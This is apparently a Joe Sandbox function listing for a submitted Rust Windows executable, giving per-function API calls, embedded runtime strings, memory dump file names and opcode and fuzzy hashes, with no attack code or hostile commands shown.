Function 00007FF6B190D570 Relevance: 1.5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

Strings

capacity overflow, xrefs: 00007FF6B190D955

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: capacity overflow
API String ID: 0-2273299319
Opcode ID: 4aff107aa0574958e26b6d86646275c17401143737db52c7bb127e2bee9d9073
Instruction ID: 86bdea22fd994b201869e6be9a4483a247497e71712d87992bf4ab6da33c78a2
Opcode Fuzzy Hash: 4aff107aa0574958e26b6d86646275c17401143737db52c7bb127e2bee9d9073
Instruction Fuzzy Hash: DEA1C362B09A8692EB20AE1AD4081797791FB45FACF404232DF6EC77D9EE3CD545C740

Function 00007FF6B19AB610 Relevance: 1.5, APIs: 1, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B19AB9AC

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f8e7802c522a26d49f6e8c3b0e0dc3d6476509ec81f07f11a0fc4084c39d85da
Instruction ID: f80a97d75b8041b11e04aa2a80a5417ade357ee02b1b373e38aac77b5ce1b043
Opcode Fuzzy Hash: f8e7802c522a26d49f6e8c3b0e0dc3d6476509ec81f07f11a0fc4084c39d85da
Instruction Fuzzy Hash: 7D910622F28692D9F7119BAD98143BE2B60BB543ACF044635DF8A967D6DF7C9189C300

Function 00007FF6B18C1430 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7357469db99b438b9c6ce93d4d982d3388a081af866c75c168486ece5fc1337
Instruction ID: 84891302e1cbfc2f52563be16f9de5053882f5d856638d79510f673f47a474f0
Opcode Fuzzy Hash: a7357469db99b438b9c6ce93d4d982d3388a081af866c75c168486ece5fc1337
Instruction Fuzzy Hash: 09E14862B1C6A5E2FB12CA299854EB96641FB11BD8F848731EF4E83BC4DF3CE5559300

Function 00007FF6B18BB410 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6fc1ab45882aa34251781b19ec314137c0af94cd43fbd8d773d790eb56cb669
Instruction ID: 490ec86117e6d79c79a0b6bee2d259fab075bda9e7decb76ef5d84f3d7108292
Opcode Fuzzy Hash: a6fc1ab45882aa34251781b19ec314137c0af94cd43fbd8d773d790eb56cb669
Instruction Fuzzy Hash: 7EF147A7A4A7E152D701563A84941ACAF419719BE4B8C8337DFA80B3D3ED2DC64FD311

Function 00007FF6B18BD7F0 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade8b9d643cf5b8fa929d4e5681530225a6e4411d85bb042868909ef77a807c7
Instruction ID: 8239930e1b477094451e0a5a5a5acc3e824c21aa500eb4702fbd8dbe7d83f5ed
Opcode Fuzzy Hash: ade8b9d643cf5b8fa929d4e5681530225a6e4411d85bb042868909ef77a807c7
Instruction Fuzzy Hash: 5DC16C97F25BA511F713433D58026B556016FA77ECA01D322FEB8B2FD5DF25A6438204

Function 00007FF6B1911340 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9d2b4a7cf65df1329fcae51e3390eb286f7b3e45008357858d26bec226aae3
Instruction ID: 1e51b4a811527f20b15c8eae8335978466c3fca223917d089f503df292c02a80
Opcode Fuzzy Hash: 3b9d2b4a7cf65df1329fcae51e3390eb286f7b3e45008357858d26bec226aae3
Instruction Fuzzy Hash: 02A1EF227285A3A7EB697A39B01557B53D5EB917A8F14C138FED6C3AC4DA2DC4D0CB00

Function 00007FF6B1983410 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 255memoryencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B194E190: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B19834A9), ref: 00007FF6B194E243
Part of subcall function 00007FF6B194E190: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B19834A9), ref: 00007FF6B194E256

DeleteSecurityContext.SECUR32 ref: 00007FF6B1983644
CertCloseStore.CRYPT32 ref: 00007FF6B1983656
HeapFree.KERNEL32 ref: 00007FF6B198368A
HeapFree.KERNEL32 ref: 00007FF6B1983734
HeapFree.KERNEL32 ref: 00007FF6B1983764
HeapFree.KERNEL32 ref: 00007FF6B1983786

Strings

future polled after completion, xrefs: 00007FF6B1983864

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$CertCloseContextDeleteSecurityStore
String ID: future polled after completion
API String ID: 3227351851-291733529
Opcode ID: 04b02e10b3f4a0b4002cdc7945fd1cdf5834331fe42f8de3e3972028924d68d9
Instruction ID: cf7e9223261ada77174d48d059cc44fb21d977b212afe8409f7f5de19b348876
Opcode Fuzzy Hash: 04b02e10b3f4a0b4002cdc7945fd1cdf5834331fe42f8de3e3972028924d68d9
Instruction Fuzzy Hash: 05C16F72604B82A5E760DF2AD8987E92365FB857ECF804132DB1D8B696DF39E345C340

Function 00007FF6B19953D0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 229memoryCOMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B19954A8
HeapFree.KERNEL32 ref: 00007FF6B19954CD
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B199557E
PostQueuedCompletionStatus.KERNEL32 ref: 00007FF6B1995598
GetLastError.KERNEL32 ref: 00007FF6B19955A2
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B1995606

Part of subcall function 00007FF6B19124E0: NtCancelIoFileEx.NTDLL ref: 00007FF6B1912532
Part of subcall function 00007FF6B19124E0: HeapFree.KERNEL32 ref: 00007FF6B19125A7
Part of subcall function 00007FF6B19124E0: HeapFree.KERNEL32 ref: 00007FF6B19125BA

Strings

failed to wake I/O driver, xrefs: 00007FF6B19955C0
A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF6B199570D
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B1995673

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressFreeHeapSingleWake$CancelCompletionErrorFileLastPostQueuedStatus
String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$called `Result::unwrap()` on an `Err` value$failed to wake I/O driver
API String ID: 140342537-2310929885
Opcode ID: b8ae7363b95e8e6fcb729a47992c35df8b8afa41781b851c24346183544ebc98
Instruction ID: 081b8533b81decef457160640e77c1a4ab7af57df89ed0f0592cd71b98a7d28b
Opcode Fuzzy Hash: b8ae7363b95e8e6fcb729a47992c35df8b8afa41781b851c24346183544ebc98
Instruction Fuzzy Hash: 83A19322E08B82AAFB50AB6DA4542BE27A0AB4579CF444137CF5D83797DF3CE595C340

Function 00007FF6B19053B0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\mpsc\queue.rs, xrefs: 00007FF6B1905810
assertion failed: (*next).value.is_some(), xrefs: 00007FF6B1905828
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B19057F2, 00007FF6B1905866

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\mpsc\queue.rs$called `Result::unwrap()` on an `Err` value
API String ID: 0-2493011862
Opcode ID: 3945030fdd7604a13155dbe452beeccaf47ed65599523b81a2e2d61bf99d0daf
Instruction ID: f38d8e75730e92727b9f102e66fd36ab00dc7ee72fea07fe37254626708fd295
Opcode Fuzzy Hash: 3945030fdd7604a13155dbe452beeccaf47ed65599523b81a2e2d61bf99d0daf
Instruction Fuzzy Hash: E2E1AE22A09B82A5FB51AF29D8483B927A0FF45B9CF454536EF5D83392DF38E485C340

Function 00007FF6B19B1910 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

freeaddrinfo.WS2_32 ref: 00007FF6B19B1993
freeaddrinfo.WS2_32 ref: 00007FF6B19B1B77
freeaddrinfo.WS2_32(?,?,?,?,?), ref: 00007FF6B19B1C5D
HeapFree.KERNEL32 ref: 00007FF6B19B1C77

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF6B19B1BDF, 00007FF6B19B1C1B
, xrefs: 00007FF6B19B1B47
assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF6B19B1BC5, 00007FF6B19B1BFD

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: freeaddrinfo$FreeHeap
String ID: $assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 4085231666-2757504381
Opcode ID: 1358f6647341724f7dda51557b2d9b090a2c10d539a00710298f266d69e1d088
Instruction ID: a69913b2847d6f3123d8ec1160e6bdaa0ab2484c210772d186336ba27c2de340
Opcode Fuzzy Hash: 1358f6647341724f7dda51557b2d9b090a2c10d539a00710298f266d69e1d088
Instruction Fuzzy Hash: C9A16B72E04B91DAE7149B99E4403AE3BB0FB48B98F51813ADF4993785DF38E582C740

Function 00007FF6B193B2AE Relevance: 10.9, APIs: 7, Instructions: 398memoryencryptionCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B193B330
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B193B3AC
CertCloseStore.CRYPT32 ref: 00007FF6B193B3B8
HeapFree.KERNEL32 ref: 00007FF6B193B3D8
CertDuplicateCertificateContext.CRYPT32 ref: 00007FF6B193B790
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B193B837
HeapFree.KERNEL32 ref: 00007FF6B193B855
HeapFree.KERNEL32 ref: 00007FF6B193CB0C

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Free$CertHeap$CertificateContext$CloseDuplicateStore
String ID:
API String ID: 2706742622-0
Opcode ID: a57e2707825f0c2a664d615bbbbc5b2da59f43446ff46b3dba79f0475cb2dbfe
Instruction ID: f92934f896aac93cfdc36afd23f2b1c30f61b0cf1b30ee7c5f4681366ce6edbb
Opcode Fuzzy Hash: a57e2707825f0c2a664d615bbbbc5b2da59f43446ff46b3dba79f0475cb2dbfe
Instruction Fuzzy Hash: BB326E22608BC699E770DF29E8447E837A4FB5978CF449126CF8D5BB56DF38A285C310

Function 00007FF6B1987540 Relevance: 10.9, APIs: 3, Strings: 4, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B1987899
HeapFree.KERNEL32 ref: 00007FF6B1987958
HeapFree.KERNEL32 ref: 00007FF6B1987A0A

Strings

a Display implementation returned an error unexpectedly, xrefs: 00007FF6B1987BAC
should be valid Url, xrefs: 00007FF6B1987B6A
<Uri as Dst>::host should have a str, xrefs: 00007FF6B1987B3C
00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00007FF6B19876D3, 00007FF6B1987750, 00007FF6B1987780

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$<Uri as Dst>::host should have a str$a Display implementation returned an error unexpectedly$should be valid Url
API String ID: 3298025750-3453387396
Opcode ID: e225738a3e54e8f7e5cfd63a9cdc9522f6aa13fba29e819a714e45fb3269f715
Instruction ID: 61588760de3080f2a20d10ea384bc8d3dc927c7529e1e27ada8695e599d87cbd
Opcode Fuzzy Hash: e225738a3e54e8f7e5cfd63a9cdc9522f6aa13fba29e819a714e45fb3269f715
Instruction Fuzzy Hash: A6124032908BC699E7359F78D8453E833A0FB5835CF445226DB9D87A9ADF38E295C340

Function 00007FF6B19D91F0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 329COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000000,?,00000000,00000000,00000080,?,00007FF6B18E77C1), ref: 00007FF6B19D9318
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000000,?,00000000,00000000,00000080,?,00007FF6B18E77C1), ref: 00007FF6B19D9460
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000000,?,00000000,00000000,00000080,?,00007FF6B18E77C1), ref: 00007FF6B19D94FF

Strings

assertion failed: prev.ref_count() >= 1, xrefs: 00007FF6B19D968E, 00007FF6B19D96A8
A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!, xrefs: 00007FF6B19D96DC

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressSingleWake
String ID: A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!$assertion failed: prev.ref_count() >= 1
API String ID: 3114109732-2812253551
Opcode ID: 018c07fee1b9117578792916aa02c3136df5abd38d95887eccf5702b4f49b98e
Instruction ID: 758ddae79bda39bd41677719cb5b9fd048919b9ff09d06b716ba112092883729
Opcode Fuzzy Hash: 018c07fee1b9117578792916aa02c3136df5abd38d95887eccf5702b4f49b98e
Instruction Fuzzy Hash: 5AE1A262A497C3A5EB55AF2D94403BA6360AF45BACF544636CF6D873DACE3DE046C300

Function 00007FF6B1941460 Relevance: 10.6, APIs: 7, Instructions: 111memoryencryptionCOMMON

Download Yara Rule

APIs

DeleteSecurityContext.SECUR32 ref: 00007FF6B194149A
CertCloseStore.CRYPT32 ref: 00007FF6B19414AC
HeapFree.KERNEL32 ref: 00007FF6B19414D0
HeapFree.KERNEL32 ref: 00007FF6B194155D
HeapFree.KERNEL32 ref: 00007FF6B194157D
HeapFree.KERNEL32 ref: 00007FF6B194159D
HeapFree.KERNEL32 ref: 00007FF6B19415ED

Part of subcall function 00007FF6B1973FE0: FreeCredentialsHandle.SECUR32(?,?,?,00007FF6B193AE03), ref: 00007FF6B1973FEC

Part of subcall function 00007FF6B193ADD0: DeleteSecurityContext.SECUR32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B193AA2B), ref: 00007FF6B193AE0A
Part of subcall function 00007FF6B193ADD0: CertCloseStore.CRYPT32 ref: 00007FF6B193AE1C
Part of subcall function 00007FF6B193ADD0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B193AA2B), ref: 00007FF6B193AE40
Part of subcall function 00007FF6B193ADD0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B193AA2B), ref: 00007FF6B193AEB6
Part of subcall function 00007FF6B193ADD0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B193AA2B), ref: 00007FF6B193AED0
Part of subcall function 00007FF6B193ADD0: HeapFree.KERNEL32 ref: 00007FF6B193AEF0
Part of subcall function 00007FF6B193ADD0: HeapFree.KERNEL32 ref: 00007FF6B193AF3D

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Free$Heap$CertCloseContextDeleteSecurityStore$CredentialsHandle
String ID:
API String ID: 2336580912-0
Opcode ID: d356f9e35683b2c24ee5633bad3a57e9b72b9f845e0f96d572e35cca3983a54e
Instruction ID: 097a293cf2b90391af32b0cf117df224e8d6b062cd807c2a161d78fbdc086782
Opcode Fuzzy Hash: d356f9e35683b2c24ee5633bad3a57e9b72b9f845e0f96d572e35cca3983a54e
Instruction Fuzzy Hash: AD51EE66A08A82D5F765DB2AE8893FD2361FB84B9CF454532CF1E87295DF38E481C340

Function 00007FF6B19F7434 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6B19F5692,?,?,?,00007FF6B1A09C96), ref: 00007FF6B19F7443
FlsSetValue.KERNEL32(?,?,?,00007FF6B19F5692,?,?,?,00007FF6B1A09C96), ref: 00007FF6B19F7479
FlsSetValue.KERNEL32(?,?,?,00007FF6B19F5692,?,?,?,00007FF6B1A09C96), ref: 00007FF6B19F74A6
FlsSetValue.KERNEL32(?,?,?,00007FF6B19F5692,?,?,?,00007FF6B1A09C96), ref: 00007FF6B19F74B7
FlsSetValue.KERNEL32(?,?,?,00007FF6B19F5692,?,?,?,00007FF6B1A09C96), ref: 00007FF6B19F74C8
SetLastError.KERNEL32(?,?,?,00007FF6B19F5692,?,?,?,00007FF6B1A09C96), ref: 00007FF6B19F74E3

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f60aa54918dd39ecee639922779fc4afd69784ff0c835df24459e1c02c9364fa
Instruction ID: c59d2cb33fe60bc165aab51e32309f29a2413c128aec952a82b7cdbfa675a164
Opcode Fuzzy Hash: f60aa54918dd39ecee639922779fc4afd69784ff0c835df24459e1c02c9364fa
Instruction Fuzzy Hash: EA111320A0C68372FB58B729999507D67526F84BBCF040639EB7ACA6DBDE2CB4418600

Function 00007FF6B19BF880 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B19DA674), ref: 00007FF6B19BF89F
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B19DA674), ref: 00007FF6B19BF8C9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B19DA674), ref: 00007FF6B19BF960
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B19DA674), ref: 00007FF6B19BF99C

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B19BF97E, 00007FF6B19BF9BA

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: ErrorLastPerformanceQuery$CounterFrequency
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 2984914903-2333694755
Opcode ID: e4aada9366b14b73b8ce31abc81888b59a013a0339b8672aa1d4467bc022593b
